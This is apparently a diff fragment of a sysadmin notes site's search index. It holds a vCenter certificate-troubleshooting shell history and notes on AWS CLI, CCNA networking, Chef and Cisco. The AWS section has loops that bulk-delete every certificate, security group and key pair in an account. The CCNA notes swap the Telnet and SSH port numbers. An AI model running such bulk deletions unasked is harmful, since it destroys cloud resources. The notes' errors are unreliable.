vcenter 46 ls 47 ls -alh 48 cat ssoserverRoot.crt 49 htop 50 top 51 service-control --status 52 toptop 53 top 54 service-control --status 55 watch -n 1 \"service-control --status\" 56 cd /etc/ssl/certs 57 ls 58 ls -alh 59 service-control 60 service-control --help 61 service-control --start vmware-vapi-endpoint 62 service-control 63 service-control --list-status 64 service-control --status 65 /usr/lib/vmware-vmafd/bin/dir-cli 66 cd /usr/lib/vmware-vmafd/bin/dir-cli 67 tail -n 100 /var/log/vmware/vpxd/vpxd.log 68 date 69 tail -n 100 /var/log/vmware/vpxd/vpxd.log 70 grep -ir ssl /var/log/vmware/vpxd/vpxd.log 71 cd /etc/vm 72 cd /etc/vmware 73 ls 74 cat backup/ 75 cat .buildInfo 76 /usr/lib/vmware-vmca/bin/certificate-manager 77 cd /tmp/vmware-root 78 ls 79 cd /var/log/vmware 80 ls 81 tail -n 100 vpxd/vpxd.log 82 service-control --status 83 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store TRUSTED_ROOTS --text | less 84 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text | less 85 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 86 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 87 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vpxd --text | less 88 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vsphere-webclient --text | less 89 cd /tmp/ 90 vi fixsts.sh 91 chmod +x fixsts.sh 92 ./fixsts.sh 93 service-control --stop --all 94 service-control --start --all 95 top 96 cd /var/log/vmware/vapi/ 97 ls 98 cd endpoint/ 99 ls 100 tail -n 100 -f endpoint.log 101 /usr/lib/vmware-vmca/bin/certificate-manager 102 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 103 ping vcenter.colo.coldnorthadmin.com 104 reset 105 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 106 /usr/lib/vmware-vmca/bin/certificate-manager 107 cat /etc/hostname 108 /usr/lib/vmware-vmca/bin/certificate-manager 109 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 110 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://localhost:7080/lookupservice/sdk | less 111 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 112 ls /usr/lib/vmidentity/tools/scripts/lstool.py 113 ls /usr/lib/vmware-lookupsvc/tools/lstool.py 114 python /usr/lib/vmware-lookupsvc/tools/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 115 clear 116 cd /usr/lib/vmware/site-packages/cis 117 ls 118 cp certificateManagerHelper.py certificateManagerHelper.py.bak 119 vi certificateManagerHelper.py 120 reset 121 /usr/lib/vmware-vmca/bin/certificate-manager 122 clear 123 htop 124 clear 125 df -h 126 history

    "},{"location":"wireshark/","title":"Wireshark","text":""},{"location":"wireshark/#get-packets-containing-a-specific-string","title":"Get packets containing a specific string.","text":"
    frame contains potato\n
    "}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Home","text":""},{"location":"aws-cli/","title":"AWS","text":""},{"location":"aws-cli/#acm","title":"ACM","text":"

    Useful things - Use no-cli-pager to send the result directly to the terminal and not to less - There is a bug for the help menu --> https://github.com/aws/aws-cli/issues/4972 - You can send it to cat as a workaround --> aws ec2 help | cat - There is an autocomplete built into the CLI - You can use --cli-auto-prompt with each prompt

    "},{"location":"aws-cli/#list-certificates","title":"List certificates","text":"
    aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn'\n
    "},{"location":"aws-cli/#acm-delete-certificates","title":"ACM Delete certificates","text":"
    for arn in $(aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn' | jq -r '.[]'); do aws acm delete-certificate --certificate-arn \"$arn\"; done\n
    "},{"location":"aws-cli/#codecommit","title":"CodeCommit","text":"

    Note, this service is deprecated by AWS. You should stop current usage and migrate to SCM alternatives (Gitlab, Github and others)

    "},{"location":"aws-cli/#list-repositories","title":"List repositories","text":"
    aws codecommit list-repositories --no-cli-pager\n
    "},{"location":"aws-cli/#delete-repositories","title":"Delete repositories","text":"
    aws codecommit delete-repository --repository-name gremlins-api\n
    "},{"location":"aws-cli/#api-gateway","title":"API Gateway","text":"

    Note the apigatewayv2 in some cases

    Get a custom domain name

    aws apigateway get-domain-names --no-cli-pager --query 'items[*]['regionalCertificateArn','domainName']' | jq -r '.[]'\n

    Delete a custom domain name

    aws apigateway delete-domain-name --domain-name sig.coldnorthadmin.com\n

    Get an API

    aws apigatewayv2 get-apis --query 'Items[*]['ApiId']' --no-cli-pager\n

    Delete an API

    aws apigatewayv2 delete-api --api-id 80wxwwwn2l\n
    "},{"location":"aws-cli/#ec2","title":"EC2","text":""},{"location":"aws-cli/#delete-security-groups","title":"Delete Security Groups","text":"
    aws ec2 describe-security-groups --query \"SecurityGroups[*].GroupName\" --no-cli-pager --output json | jq -r '.[]' | while IFS= read -r sg; do aws ec2 delete-security-group --group-name $sg; done \n
    "},{"location":"aws-cli/#delete-key-pairs","title":"Delete key pairs","text":"
    aws ec2 describe-key-pairs --query \"KeyPairs[*].KeyName\" --no-cli-pager | jq -r '.[]' | while IFS= read -r key; do aws ec2 delete-key-pair --key-name $key --no-cli-pager; done\n
    "},{"location":"bluetooth/","title":"Bluetooth","text":"

    Ubuntu reference https://wiki.ubuntu.com/DebuggingBluetooth#:~:text=On%20desktop%3A,%2Fvar%2Flog%2Fsyslog

    "},{"location":"bluetooth/#basic-bluetooth-troubleshooting-commands","title":"Basic bluetooth troubleshooting commands","text":"
    bluetoothctl --version\n
    hciconfig -a\n
    bluetoothctl\n[bluetooth]# show\n[bluetooth]# devices\n[bluetooth]# info <mac addr of any device you have problems with>\n
    rfkill list\nNecessary bluetooth log files in debug mode as per below\n
    "},{"location":"ccna/","title":"Cisco-CCNA","text":""},{"location":"ccna/#ethernet-and-frames","title":"Ethernet and Frames","text":""},{"location":"ccna/#ethernet-type-field","title":"Ethernet \"Type\" field","text":"

    Hub = port needs to be at half-duplex

    "},{"location":"ccna/#cisco-security","title":"Cisco Security","text":""},{"location":"ccna/#user-and-access-management","title":"User and access management","text":"

    Enable secret takes precedence over enable password.

    enable password potato\nenable secret potato2\n\nenable password = potato2\n

    Enable AAA (allow user with privilege 15 to login straight into enable mode)

    conf t\naaa new-model\naaa authentication login default group local\naaa authorization exec default group local\n

    Create user with default privilege 15 level

    conf t\nusername $USERNAME privilege 15 secret $PASSWORD\n

    login = password and username of the vty itself. login local = Local username database

    conf t\nline con 0\nlogin local\nexec-timeout 0 0\nlogging synchronous\n

    Line VTY user are set to privilege 15 automatically.

    conf t\nline vty 0 15\nprivilege level 15\n

    \"Encrypt\" passwords in the startup-config.

    service password-encryption\n
    "},{"location":"ccna/#port-security","title":"Port-Security","text":"

    Enabling port security on port Cannot be enabled on a trunk/dynamic/auto port. Must be an access port.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\n

    Keep MAC addresses when port-shutdown or switch reload.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\nswitchport port-security mac-address sticky\n
    "},{"location":"ccna/#mac-aging","title":"MAC aging","text":"

    Dynamic MAC aging default = 0 absolute timer = Counts down irregardless of traffic inactivity timer = resets when traffic is seen from MAC. maximum - Default 1 If you raise the number of max MAC addresses on a port, you can run static and dynamic MAC detection.

    "},{"location":"ccna/#mac-address-conversion","title":"MAC address conversion","text":"Character HEX a 10 b 11 c 12 d 13 e 14 f 15

    Hexadecimal A7 to decimal A = 10 units of 16 (A=16) ---> 160 7 = 7 units of 1 ---> 7 160 + 7 = 167

    Decimal 241 to Hexadecimal 1. f = 15 * 16 2. 1 = 1 * 1 3. F1

    "},{"location":"ccna/#violation-option","title":"Violation option","text":"

    protect - Drops traffic, no SYSLOG, no SNMP Trap, no counters increased restrict - Drops traffic, generate SNMP trap, generate SYSLOG. shutdown - Default, increase violation counters, Port shutdown in error-disabled.

    Show port-security commands

    show port-security interface fastethernet 0/1\n
    show port-security address\n

    Error disabled recovery Default recovery 300 seconds

    conf t\nerrordisable recovery cause ?\nerrordisable recovery cause psecure-violation\nerrdisable recovery interval 30\n
    show errdisable recovery\n
    "},{"location":"ccna/#vlan-interfaces-svi","title":"VLAN interfaces (SVI)","text":""},{"location":"ccna/#autonegociation-speed-and-duplex","title":"Autonegociation - Speed and Duplex","text":""},{"location":"ccna/#interface-range","title":"Interface range","text":"
    interface range fastethernet 0/1-24\ninterface range fastethernet 0/1-24,25,26\n
    "},{"location":"ccna/#tcp-and-udp","title":"TCP and UDP","text":""},{"location":"ccna/#tcp","title":"TCP","text":""},{"location":"ccna/#udp","title":"UDP","text":""},{"location":"ccna/#port-numbers","title":"Port Numbers","text":"

    Well-known port numbers:

    Protocol / Transport Port HTTPS / TCP 443 SNMP / UDP 161 SMTP / TCP 25 TELNET / TCP 22 SSH / TCP 23

    Socket ---> Combination of an ipaddress and a port number. 192.168.1.1:10000

    "},{"location":"ccna/#dhcp","title":"DHCP","text":"

    DORA 1. Discover - Broadcast from client. 2. Offer - DHCP server receives Discover and sends unicast offer to client. 3. Request - Client sends request for the offered IP address. 4. Ack - DHCP server ack the client request and assigns the IP.

    "},{"location":"ccna/#routing-static-routes","title":"Routing - Static Routes","text":"
    ip route destination_subnet destination_mask [local-router-exit-interface | next-hop-ip-address]\n\nip route 2.2.2.2 255.255.255.0 192.168.1.1\n\n#Default Route\nip route 0.0.0.0 0.0.0.0 [local-router-exit-interface | next-hop-ip-address]\n
    "},{"location":"ccna/#routing-distance-vector-protocols-rip","title":"Routing - Distance Vector Protocols - RIP","text":"

    RIPv1 / IGRP

    RIPv2

    Split Horizon

    Route Poisoning

    Hops

    "},{"location":"ccna/#enabling-ripv2","title":"Enabling RIPv2","text":"
    conf t\nrouter rip\n\n#Show protocols active on router\nshow ip protocols\n\n#Enable specific version of RIPv2 per interface or global.\ninterface gig0/1\nip rip send version 2\n\nconf t\nrouter rip\nrip version 2\nnetwork 10.10.10.0\nnetwork 10.10.11.0\n\n#Disable auto summary\nconf t\nrouter rip\nno auto-summary\n\n#Enable split Horizon\ninterface serial0/1/0\nip split-horizon\n

    Confirming that RIPV2 works.

    show ip protocols\nshow ip rip database\n

    Clear RIP routes.

    clear ip route *\n
    "},{"location":"ccna/#passive-interfaces","title":"Passive interfaces","text":"

    Prevents sending RIPv2 updates from interfaces where it's not necessary.

    conf t\nrouter rip\npassive-interface fastethernet0/1\npassive-interface fastethernet0/2\n
    conf t\nrouter rip\npassive-interface default\nno passive-interface fastethernet0/1\nno passive-interface fastethernet0/2\n
    "},{"location":"ccna/#rip-load-balancing","title":"RIP Load Balancing","text":"

    1) If a subnet is reachable through two paths with the same hope count --> Load balance across the two links.

    Disabling equal cost load balancing

    conf t\nrouter rip\nmaximum-path 1\n
    "},{"location":"ccna/#default-route-in-rip","title":"Default route in RIP","text":"
    conf t\nrouter rip\ndefault-information originate\n
    "},{"location":"ccna/#routing-administrative-distance","title":"Routing Administrative distance","text":"

    1) The prefix mask is considered first. The more specific route is installed. 2) If the prefix max is \"=\" ---> Administrative Distance is checked. The route with the lowest ADs wins.

    "},{"location":"ccna/#floating-static-routes","title":"Floating static routes","text":"

    If a route with a lower AD is removed from the routing table, the static route will be added and become active.

    conf t\nip route 2.2.2.0 255.255.255.0 21.1.1.2 [static route metric here | higher than routing protocol 1-255 ]\n
    "},{"location":"ccna/#subnetting","title":"Subnetting","text":"128 64 32 16 8 4 2 1 45 0 0 0 0 1 1 0 1

    200.17.100.3

    128 64 32 16 8 4 2 1 200 1 1 0 0 1 0 0 0 17 0 0 0 1 0 0 0 1 100 0 1 1 0 0 1 0 0 3 0 0 0 0 0 0 1 1

    11001000.00010001.01100100.00000011

    "},{"location":"ccna/#network-class","title":"Network class","text":"Class A Class B Class C 1st Octet range 1 - 126 128 - 191 192 - 223 Network Mask 255.0.0.0 - /8 255.255.0.0 - /16 255.255.255.0 - /24"},{"location":"ccna/#number-of-subnet-in-a-network-200110-27","title":"Number of subnet in a network - 200.1.1.0 /27","text":"
    1. Find the class of the subnet --> Class C (+192)
    2. A class C is a /24 by default.
    3. /27 - /24 = 3 subnet bits.
    4. Number of subnet --> 2^Number_subnet_bits_remaining --> 2^3 --> 2 * 2 * 2 = 8 subnets
    "},{"location":"ccna/#number-of-hosts-per-subnet-200110-27","title":"Number of hosts per subnet - 200.1.1.0 /27","text":"
    1. Find the number of host bits --> /32 - /27 --> /5 host bits
    2. Find the number of valid host per subnet - remove subnet and broadcast address.
    3. (2^(number of host bits))-2 --> 2^5 --> 2 * 2 * 2 * 2 * 2 --> 32 - 2 --> 30
    "},{"location":"ccna/#find-the-subnet-of-an-ip-address-101721418","title":"Find the Subnet of an IP address - 10.17.2.14/18","text":"
    1. /18 = First two octets = 16 bits + 2 bits from third octet
    2. 10.17.00000010
    3. 10.17.00 000000 --> Total of 18 bits for subnet address
    4. Subnet address = 10.17.0.0/18
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-210461100-25","title":"Find the broadcast and range of valid addresses in subnet - 210.46.110.0 /25","text":"
    1. /32 - /25 = last 7 bits --> host bits
    2. 01111111 --> 64 + 32 +16 +8 + 4 + 2 +1 --> 96 + 16 + 15 --> 96 + 31 --> Broadcast = 210.46.110.127
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-15010640-18","title":"Find the broadcast and range of valid addresses in subnet - 150.10.64.0 /18","text":"
    1. /32 - /18 = last 14 bits --> host bits
    128 64 32 16 8 4 2 1 64 0 1 0 0 0 0 0 0
    1. Broadcast --> 150.10.01111111.11111111 --> 150.10.127.255
    2. Range of valid addresses --> 150.10.64.1 to 150.10.127.254
    "},{"location":"ccna/#access-lists","title":"Access Lists","text":""},{"location":"ccna/#wildcard-masks","title":"Wildcard masks","text":""},{"location":"ccna/#standard-acl","title":"Standard ACL","text":" 
    <1-99>       Standard IP access-list number\n<1300-1999>  Standard IP access-list number (expanded range)\nWORD         Access-list name\n
    ip access-list standard 5 deny 3.3.3.0 0.0.0.255\ninterface fastethernet0\nip access-group 5 in\n
    "},{"location":"ccna/#extended-acl","title":"Extended ACL","text":""},{"location":"ccna/#named-extendedstandard-acl","title":"Named Extended/Standard ACL","text":" 
    conf t\nip access-list extended BLOCK11\ndeny ip 3.3.3.0 0.0.0.255 11.11.11.0 0.0.0.255\npermet ip any any\n
    "},{"location":"ccna/#acl-on-vty-lines","title":"ACL on VTY lines","text":"
    conf t\nline vty 0 14\naccess-class MGMT-NETWORKS in\n
    "},{"location":"ccna/#acl-sequence-numbers","title":"ACL Sequence numbers","text":" 
    conf t\nip access-list extended 101\nno $SEQUENCE_NUMVER\n
    "},{"location":"ccna/#where-to-apply-acls","title":"Where to apply ACLs","text":""},{"location":"ccna/#ntp-network-time-protocol","title":"NTP - Network Time Protocol","text":""},{"location":"ccna/#stratum-level-of-accuracy-of-the-ntp-server","title":"Stratum - Level of accuracy of the NTP server.","text":""},{"location":"ccna/#ntp-modes","title":"NTP Modes","text":" 
    !*** Set the device itself as the master NTP server.\nconf t\nntp master\n
    !*** Set the NTP server for the device.\nconf t\nntp server ntp.nist.ca\n
    conf t\nntp peer ntp.potato.com\n
    !*** Show all ntp services from which the device will sync it's clock. Also shows the preferred device.\nshow ntp associations\n\nshow ntp status\n\nshow clock\n
    !*** Under device interface configuration.\n!*** Sets broadcast server mode (send updates)\nconf t\ninterface serial 0/1/0\nntp broadcast\n\n\n!*** Set client broadcast mode\nconf t\ninterface serial 0/1/0\nntp broadcast client\n
    "},{"location":"ccna/#nat-pat-network-address-translation-port-address-translation","title":"NAT / PAT - Network Address Translation / Port Address Translation","text":""},{"location":"ccna/#static-nat","title":"Static NAT","text":" 
    !*** Place on the interfaces closest to the hosts.\nip nat inside\n\n!*** Place on the WAN interface.\nip nat outside\n\n!*** Setup Static NAT / One to one mapping\nip nat inside source static 10.1.1.2 200.1.1.1\n\n\n!*** Show translations\nshow ip nat translations\n\n!*** Show NAT statistics\nshow ip nat statistics\n\n!*** clear ip nat table to reset the NAT mappings\nclear ip nat translations *\n
    "},{"location":"ccna/#dynamic-nat","title":"Dynamic NAT","text":"

    Allow the NAT of a pool of internal address to a pool of outside addresses.

    !*** Create IP NAT Pool\nip nat pool CCNA 200.1.1.1 200.1.1.5 prefix-length 24\n\n!*** Create the access-list of internal host that will be NAT.\naccess-list 2 permit host 10.1.1.2\naccess-list 2 permit host 10.1.1.22\n\n!*** Create the NAT function for the access-list 2 and the pool CCNA  \nip nat inside source list 2 pool CCNA\n
    "},{"location":"ccna/#port-address-translation-nat-overload","title":"Port address translation - NAT Overload","text":"

    Allows the mapping of multiple inside addresses to a single outside address using a combination of the IP address / Port Number in ordre to uniquely identify each flow of data.

    !*** Overload of the inside addresses to the outside address\nip nat inside source list 2 interface serial0/1/0 overload\n
    "},{"location":"ccna/#ipv6","title":"IPv6","text":""},{"location":"ccna/#compressing-ipv6-addresses","title":"Compressing IPv6 addresses","text":""},{"location":"ccna/#assigning-ipv6-addresses-to-interfaces","title":"Assigning IPv6 addresses to interfaces","text":"
    !### Enable IPv6 Routing for the router.\nipv6 unicast-routing\n\n!### Assign an IPv6 address to an interface\ninterface fastethernet0/1\nipv6 address 2001:1111:2222:1::1/64\n
    "},{"location":"ccna/#types-of-ipv6-addresses","title":"Types of IPv6 addresses.","text":""},{"location":"ccna/#eui-64-process","title":"EUI-64 Process","text":"
    1. Take MAC address of the interface
    2. 11-22-33-aa-bb-cc
    3. Divide in half and insert FFFE.
    4. 11-22-33-FF-FE-AA-BB-CC
    5. 1122:33FF:FEAA:BBCC
    6. Do the bit inversion (invert the 7th bit of the address)
    7. 1122:33FF:FEAA:BBCC --> 1322:33FF:FEAA:BBCC
    "},{"location":"ccna/#use-eui-64-process-for-global-unicast-address","title":"Use EUI-64 process for global unicast address.","text":"
    ipv6 address 2001:1111:2222:1::/64 eui-64\n
    "},{"location":"ccna/#ipv6-ndp-neighbor-discovery-process","title":"IPv6 NDP - Neighbor Discovery Process","text":""},{"location":"ccna/#ndp-router-discovery","title":"NDP - Router Discovery","text":"
    1. Hosts multicast packet - Router Solicitation (RS) message - Destination address FF02::2 - All-IPv6-Routers address
    2. Routers receives RS on FF02::2 and sends RA (Router Advertisement).
    3. If the soliciting node HAS an IPv6 address --> RA is unicast to the host.
    4. If the soliciting node DOES NOT have an IPv6 address --> RA is sent to FF02::1 - \"All-IPV6-Nodes\"
    5. RA are also sent to FF02::1 every 200 seconds.
    6. FF02::1 --> All IPv6 hosts.
    "},{"location":"ccna/#ndp-host-discovery","title":"NDP - Host Discovery","text":""},{"location":"ccna/#dhcp-and-ipv6","title":"DHCP and IPv6","text":""},{"location":"ccna/#stateful-dhcp","title":"Stateful DHCP","text":"

    Stateful DHCP does not send \"Default Gateway\" in the DHCP lease. That part is discovered during the NDP process with NA and NS messages.

    "},{"location":"ccna/#stateless-dhcp","title":"Stateless DHCP","text":""},{"location":"ccna/#ipv6-duplicate-address-detection-dad","title":"IPv6 - Duplicate Address Detection - DAD","text":"

    Prevents duplicate addresses from being used on the network. 1. The host will send an NS (with the source address all :: - 128 zeros - unspecified ipv6 address) to the address it wants to use to FF02::1 (All IPV6 nodes) 2. If it gets a response, it means that a host is already using that address.

    "},{"location":"ccna/#ipv6-packet-header","title":"IPv6 Packet Header","text":""},{"location":"ccna/#logging-and-timestamps","title":"Logging and Timestamps","text":"

    Change the aspect and format of timestamps for SYSLOG and DEBUG message.

    service timestamps log datetime\n\n!### Add year to log timestamps.\nservice timestamps log datetime year\n\n!### Add millisecond to log timestamps.\nservice timestamps log datetime msec\n\nservice timestamps log datetime year msec show-timezone\n
    "},{"location":"ccna/#logging-to-remote-server","title":"Logging to remote server","text":"

    Enable logging to the console.

    logging console\n

    Enable buffered logging. Local buffer on the server.

    logging buffer\n

    Enable logging to a remote server.

    logging host $SYSLOG_SERVER_IPADDRESS\n

    Enable console logging on SSH/Telnet session

    conf t\nlogging monitor\nexit\nterminal monitor\n
    "},{"location":"ccna/#banner-configuration","title":"Banner configuration","text":"

    Three types of banners.

    "},{"location":"ccna/#cdp-cisco-discovery-protocol","title":"CDP - Cisco Discovery Protocol","text":" 
    show cdp neighbors\nshow cdp neighbors details\nshow cdp entry $REMOTE_DEVICE_HOSTNAME\n\n!*** Enable CDP globally.\ncdp run\nno cdp run\n\n!*** Enable CDP on an interface\ninterface fastethernet0/0\ncdp enable\nno cdp enable\n\n!*** Show CDP information\nshow cdp information\nshow cdp interface fastethernet 0/0\n
    "},{"location":"ccna/#lldp-link-layer-discovery-protocols","title":"LLDP - Link Layer Discovery Protocols","text":"

    You can disable the received and transmit of LLDP packets per interface. That is not possible for CDP.

    show lldp\n\nconf t\nlldp run\n\nshow lldp neighbor detail\n

    "},{"location":"ccna/#confreg-register-and-password-recovery","title":"Confreg Register and Password Recovery","text":" 
    show version | include register\nconfig-register 0x2142\n
    "},{"location":"chef/","title":"Chef","text":""},{"location":"chef/#chef-server-setup","title":"Chef server setup","text":"
    sudo dpkg -i /tmp/chef-server-core-<version>.deb\nchef-server-ctl reconfigure\nchef-server-ctl user-create USER_NAME FIRST_NAME LAST_NAME EMAIL 'PASSWORD' --filename FILE_NAME\nchef-server-ctl org-create northernsysadmin 'Northern Sysadmin Inc' --association_user sysadmin --filename /var/chef_ssh/northernsysadmin-validator.pem\n
    knife ssl check\nknife ssl fetch\n\nknife cookbook upload $COOKBOOK_NAME_HERE\nknife client list\nknife cookbook list\n
    knife bootstrap 10.255.255.8 --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1 --run-list 'recipe[learn_chef_apache2]'\n
    knife node list\nknife node show $NODE_NAME\n
    "},{"location":"chef/#create-roles-and-assign-cookbooks-to-them","title":"Create roles and assign cookbooks to them.","text":"

    roles/ntp.json

    {\n   \"name\": \"ntp\",\n   \"description\": \"NTP server role.\",\n   \"json_class\": \"Chef::Role\",\n   \"default_attributes\": {\n     \"chef_client\": {\n       \"interval\": 60,\n       \"splay\": 1\n     }\n   },\n   \"override_attributes\": {\n   },\n   \"chef_type\": \"role\",\n   \"run_list\": [\"recipe[chef-client::default]\",\n                \"recipe[chef-client::delete_validation]\",\n                \"recipe[ntpd::default]\"\n   ],\n   \"env_run_lists\": {\n   }\n}\n
    1. Upload the role to the Chef Server : knife role from file roles/web.json
    2. Check that the role is on the server : knife role list - knife role show ntp
    3. Find node name from knife node list - knife node run_list set puppet-minion1 \"role[ntp]\"
    4. Confirm that the role is applied to the Node : knife node show puppet-minion1 --run-list
    5. Run chef-client on the node.
    6. knife ssh 10.255.255.8 'role:web' 'sudo chef-client' --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1
    "},{"location":"chef/#dependencies-in-cookbooks","title":"Dependencies in cookbooks.","text":"

    metadata.rb - keyword \"depends\" - Used to list the other coobooks from which the cookbook depends to run properly.

    name 'prometheus_node'\nmaintainer 'Laurent Dumont'\nmaintainer_email 'ldumont@northernsysadmin.com'\nlicense 'All Rights Reserved'\ndescription 'Installs/Configures prometheus-node'\nlong_description 'Installs/Configures prometheus-node'\nversion '0.1.1'\ndepends 'tar'\nchef_version '>= 12.14' if respond_to?(:chef_version)\n
    "},{"location":"cisco/","title":"Cisco","text":""},{"location":"cisco/#general-troubleshooting","title":"General Troubleshooting","text":"

    IOS-XR

    show route vrf all 10.4.229.135/32\nshow route vrf all | inc 10.4.229. \nshow evpn evi vpn-id 11034\n
    #IPV4\nshow arp vrf $VRF_NAME  Te0/0/0/6.200\n\n#IPV6\nshow ipv6 neighbors vrf $VRF_NAME Te0/0/0/6.198\n
    show bgp vrf BMCE ipv6 unicast summary\nshow bgp vrf BMCE ipv4 unicast summary\n
    show bfd ipv6 session\nshow bfd ipv4 session\n
    show running-config  | utility egrep -C5 bfd\nshow isis neighbors\nshow bgp ipv4 all summary\n
    "},{"location":"cisco/#show-detailed-information-about-interface","title":"Show detailed information about interface","text":"
    show controllers TenGigE0/0/0/18\n
    "},{"location":"cisco/#show-control-plane-policing","title":"Show control plane policing","text":"
    show running-config control-plane\n

    !Check Policy-Map drops/number of packet matching the policy.

    show policy-map interface $PHYSICAL_INTERFACE service instance $SVC_INST_ID\n

    !Show l2vpn xconnect status (ASR 9k)

    show l2vpn service xconnect interface gigabitEthernet 0/1\n

    !Show l2vpn xconnect status with details (ASR 9k)

    show l2vpn xconnect neighbor 192.252.143.75 pw-id 702 detail\n

    !Show service-instance traffic details (not xconnect, just local service instance)

    show ethernet service instance id 205 int ten0/3/0 detail\n
    show mpls l2transport vc vcid 395 detail\n

    !ASR 9000 | IOS-XE

    show l2vpn service xconnect interface TenGigabitEthernet0/3/0\n
    show l2vpn xconnect group OPEN01 xc-name OPEN01-C220\n
    show l2vpn xconnect group PARA07 detail\n

    !BGP stuff | IOS-XE

    show bgp summary | inc NEIGHBOR_IP\n

    !BGP stuff | IOS-XR

    show ip bgp summary\nshow ip bgp neighbors\nshow ip bgp neighbors 1.1.1.1\n

    !Montrer les routes recu d'un neighbor en particulier

    conf t\nrouter bgp AS_NUMBER\n

    !Il faut activer le log des routes pour chacun des neighbors BGP concern\u00e9s

    neighbor 1.1.1.1 soft-reconfiguration inbound\nexit\nsh ip bgp neighbors 1.1.1.1 received-routes\nsh ip bgp neighbors 1.1.1.1 advertised-routes\n
    conf t\nrouter bgp AS_NUMBER\nneighbor 1.1.1.1 shutdown\n

    !Satellite 9k light levels

    show nV satellite status\ntelnet vrf **nVSatellite 10.0.100.1\n\n!GigabitEthernet112/0/0/17 ---> Satellite 112\ntelnet vrf **nVSatellite 10.0.112.1\n!Port 17 on ASR = Port 18 on Satellite\nsh satellite powerlevels port 18\n

    https://www.cisco.com/c/en/us/td/docs/routers/access/4400/troubleshooting/memorytroubleshooting/isr4000_mem.html https://www.cisco.com/c/en/us/support/docs/routers/4000-series-integrated-services-routers/210760-Monitor-CPU-Usage-On-ISR4300-Series.html

    show process cpu sorted | ex 0.0\n
    show platform hardware qfp active datapath utilization\n
    show platform software status control-processor\n
    show platform software status control-processor brief\n
    show processes cpu platform sorted\n
    show platform software status control-processor brief\n

    Show CPU and Memory like \"htop\" for Linux

    monitor platform software process rp active\n
    "},{"location":"cisco/#troubleshooting-cisco-isr-memory","title":"Troubleshooting Cisco ISR Memory.","text":"

    Show IOS processes memory usage.

    show processes memory\n

    Show platform CPU and Memory usage

    show platform resources\n

    Show IOS-XE Memory usage (not IOS)

    show platform software status control-processor brief\n
    "},{"location":"cisco/#cisco-barebones-iosxr-bgp-config","title":"Cisco barebones IOSXR BGP config","text":"
    router bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 remote-as 65505\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd fast-detect\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd multiplier 3\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd minimum-interval 100\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all in\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all out\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast as-override\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast soft-reconfiguration inbound always\n
    "},{"location":"cisco/#cisco-radius","title":"Cisco Radius","text":"
    conf t\naaa new-model\n\naaa group server radius DHMTL-RADIUS\n server-private 10.0.99.22 auth-port 1812 acct-port 1813 key $INSERT_KEY_HERE\n\naaa group server tacacs+ DHMTL-TACACS\n server-private 10.0.99.22 key $INSERT_KEY_HERE\n\naaa authentication login default group DHMTL-RADIUS local\naaa authorization exec default group DHMTL-RADIUS local\naaa accounting commands 15 default start-stop group DHMTL-TACACS\naaa accounting commands 3 default start-stop group DHMTL-TACACS\n
    "},{"location":"cisco/#activate-telnet-on-ios-xr","title":"Activate Telnet on IOS-XR","text":"
    telnet vrf management ipv4 server max-servers 10\ntelnet vrf $VRF_NAME ipv6 server max-servers $MAX_CONCURRENT_TELNET_CONNECTIONS\n
    "},{"location":"cumulus/","title":"Cumulus","text":""},{"location":"cumulus/#random-commands","title":"Random commands","text":"
